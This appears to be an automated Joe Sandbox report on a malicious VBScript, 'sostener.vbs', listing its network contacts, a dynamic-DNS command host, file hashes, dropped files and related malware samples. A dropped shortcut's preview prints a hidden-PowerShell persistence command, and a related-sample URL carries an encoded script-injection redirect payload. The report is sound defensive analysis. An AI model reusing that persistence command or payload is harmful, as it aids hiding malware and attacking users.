185.166.143.50  bitbucket.org                  Germany         16509   AMAZON-02US                false
46.246.14.3     toskaadmx.duckdns.org          Sweden          42708   PORTLANEwwwportlanecomSE   true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524706
Start date and time: 2024-10-03 06:52:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sostener.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@25/21@6/6
EGA Information:
• Successful, ratio: 37.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 84
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.74.202, 172.217.18.10, 142.250.185.138, 172.217.16.138, 142.250.181.234, 142.250.185.106, 142.250.185.202, 142.250.186.170, 142.250.185.74, 216.58.212.170, 142.250.186.42, 142.250.184.202, 142.250.185.234, 142.250.184.234, 142.250.185.170, 216.58.206.42, 142.250.186.106
• Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegAsm.exe, PID 7308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5368 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7208 because it is empty
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time       Type              Description
00:53:04   API Interceptor   95x Sleep call for process: powershell.exe modified
00:53:13   API Interceptor   3312765x Sleep call for process: RegAsm.exe modified
06:53:13   Autostart         Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.4.235
    envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
    New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
    Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
    Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
    Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
    Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
188.114.96.3
    http://Asm.alcateia.org | malicious | HTMLPhisher | asm.alcateia.org/
    hbwebdownload - MT 103.exe | malicious | FormBook | www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
    z4Shipping_document_pdf.exe | malicious | FormBook | www.bayarcepat19.click/g48c/
    update SOA.exe | malicious | FormBook | www.bayarcepat19.click/5hcm/
    docs.exe | malicious | FormBook | www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
    https://wwvmicrosx.live/office365/office_cookies/main | malicious | HTMLPhisher | wwvmicrosx.live/office365/office_cookies/main/
    http://fitur-dana-terbaru-2024.pages.dev/ | malicious | HTMLPhisher | fitur-dana-terbaru-2024.pages.dev/favicon.ico
    http://mobilelegendsmycode.com/ | malicious | Unknown | mobilelegendsmycode.com/favicon.ico
    http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE | malicious | WinSearchAbuse | download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
    ADNOC requesting RFQ.exe | malicious | FormBook | www.chinaen.org/zi4g/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
paste.ee
    NhtSITq9Zp.vbs | malicious | Remcos | 188.114.96.3
    risTLdc664.vbs | malicious | FormBook | 188.114.97.3
    NTiwJrX4R4.vbs | malicious | Remcos, PureLog Stealer | 188.114.97.3
    o45q0zbdwt.vbs | malicious | PureLog Stealer | 188.114.97.3
    OIQ1ybtQdW.vbs | malicious | Remcos, PureLog Stealer | 188.114.96.3
    1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 188.114.96.3
    vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 188.114.97.3
    qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 188.114.96.3
    asegurar.vbs | malicious | Remcos | 188.114.97.3
    dcsegura.vbs | malicious | AsyncRAT, DcRat | 188.114.97.3
                                                            s3-w.us-east-1.amazonaws.comhttps://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                            • 3.5.29.116
                                                            https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                                                            • 52.217.132.193
                                                            https://convertwithwave.comGet hashmaliciousUnknownBrowse
                                                            • 52.217.105.36
                                                            http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                                            • 52.217.130.161
                                                            https://trello.com/c/2T5XVROVGet hashmaliciousHTMLPhisherBrowse
                                                            • 52.216.178.155
                                                            https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_iosGet hashmaliciousUnknownBrowse
                                                            • 52.216.35.105
                                                            https://www.givingday.communityschoolnaples.org/Get hashmaliciousUnknownBrowse
                                                            • 3.5.30.234
                                                            https://tiktoktv.cn/Get hashmaliciousUnknownBrowse
                                                            • 52.216.39.57
                                                            https://tt8352.com/Get hashmaliciousUnknownBrowse
                                                            • 3.5.27.255
                                                            http://metauscvxlkogimens.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                            • 52.216.58.241
                                                            bitbucket.org0XVZC3kfwL.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            nTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                            • 185.166.143.49
                                                            envifa.vbsGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.48
                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                            • 185.166.143.50
                                                            S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                            • 185.166.143.50
                                                            SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                            • 185.166.143.48
                                                            SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                            • 185.166.143.50
                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                            • 185.166.143.50
                                                            https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                                            • 185.166.143.48
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 323
Entropy (8bit): 5.363435887027673
Encrypted: false
SSDEEP: 6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
MD5: A92E44C0313DAFEC1988D0D379E41A2F
SHA1: C2F5644C418A81C1FB40F74298FF39D1420BFAC0
SHA-256: F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
SHA-512: 4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (604), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):16171698
                                                            Entropy (8bit):3.618016381944346
                                                            Encrypted:false
                                                            SSDEEP:384:ySSSSbSSSSbSSSSbSSSSCSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSCSSB:4
                                                            MD5:B18FCB9A2AF66C700B70CD9F9A58A563
                                                            SHA1:DAE167B9D105E0A29DFB43D83540634819C41F0F
                                                            SHA-256:06EB284366B1E9EF0CB5DDE4F81E8AD974370D6CA1CF6E9969A9721EE5A6DF2D
                                                            SHA-512:6003D459F3B01B5E71BC6CEF265BAA91CB083E5F7B23E3833CC2392538579EC776E5036405E16DA5389CA9DBB955080FBE93C932EEAF231C8C7F19CE05A7974C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:..............'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.'.'.'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'. . .5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):5458
                                                            Entropy (8bit):3.947967445017931
                                                            Encrypted:false
                                                            SSDEEP:48:dC9P2Zb2BCtJbuOMCnhu7k2Up/lzDSogZo1E2Up/lIDSogZox1:Q9OZb2BCtJMCYY2Up/kHV2Up/lHG
                                                            MD5:63A2A301C472B28E18A688220E837F1B
                                                            SHA1:596573AC1B048A22D29FDB6644A4D53E5C8C95C3
                                                            SHA-256:084C8B38F8B61095A5656652C649CBB0C0686F428E122FC8C2EBD494BEA66EE3
                                                            SHA-512:436B65CD459FB4C6D87160C971A52C547379EF493D61EEA315C9288F16DFB4B56516BF816522C365D0C875B3752E0915A608F61B0C80A2D7E5BA886CF92EB234
                                                            Malicious:false
                                                            Preview:...................................FL..................F. .. ....VM$P...|.C,P....BY$P.............................:..DG..Yr?.D..U..k0.&...&...... M.......(.P....3F,P.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlCY.&....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....CY.&..Roaming.@......DWSlCY.&....C......................n..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlCY.&....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlCY.&....E......................._.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlCY.&....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlCY.&....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1.....CY.&..Startup.h......DWUlCY.&....................>...../h..S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.....CY.& .___WIN~1.LNK.........CY.&CY.&
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=169, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                            Category:dropped
                                                            Size (bytes):1202
                                                            Entropy (8bit):3.3426522433889003
                                                            Encrypted:false
                                                            SSDEEP:12:8o6m/3BVSXvk44X3ojsqzKtnWNjW+UcCsvXF4rsZcVlQ1D9eiNL4t2YZ/elFlSJm:8a/BHYVKVWA+/CWerCcIb5qy
                                                            MD5:E4EE0F1B172F2CDE33D0B1C7F70C78EB
                                                            SHA1:24DB6C9F3432AEF13308631BC779EA2379A6CF76
                                                            SHA-256:D8FF3118898DE9A87A69C4516D9FFCA157EE8614F054D0CD13636C2DD4C3F50D
                                                            SHA-512:B2740257D577C8F623C70516C1099D51E7DF33D73491F10473CCB8D4A647B3BBCA59F4031C66DFD4E3B97C59D16EA78A1AE77EA1C06AF323681931B95B2497ED
                                                            Malicious:true
                                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e.......Q.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.g.-.W.i.n.d.o.w.S.t.y.l.e. .h.i.d.d.e.n. .-.c.o.m.m.a.n.d. .w.s.c.r.i.p.t...e.x.e. ././.b. ././.n.o.l.o.g.o. .'.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.o.s.t.e.n.e.r...v.b.s.'...I.m.a.g.e.r.e.s...d.l.l
                                                            File type:Unicode text, UTF-16, little-endian text, with very long lines (604), with CRLF line terminators
                                                            Entropy (8bit):3.618016381944346
                                                            TrID:
                                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                            • MP3 audio (1001/1) 32.22%
                                                            • Lumena CEL bitmap (63/63) 2.03%
                                                            • Corel Photo Paint (41/41) 1.32%
                                                            File name:sostener.vbs
                                                            File size:16'171'698 bytes
                                                            MD5:b18fcb9a2af66c700b70cd9f9a58a563
                                                            SHA1:dae167b9d105e0a29dfb43d83540634819c41f0f
                                                            SHA256:06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
                                                            SHA512:6003d459f3b01b5e71bc6cef265baa91cb083e5f7b23e3833cc2392538579ec776e5036405e16da5389ca9dbb955080fbe93c932eeaf231c8c7f19ce05a7974c
                                                            SSDEEP:384:ySSSSbSSSSbSSSSbSSSSCSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSCSSB:4
                                                            TLSH:0DF6B434ED6E6447BD3F41EF3A616872C51B9B0612C24C3B292A504F4EBE6017EB1DE9
                                                            File Content Preview:..............'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.'.'.'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
                                                            Icon Hash:68d69b8f86ab9a86
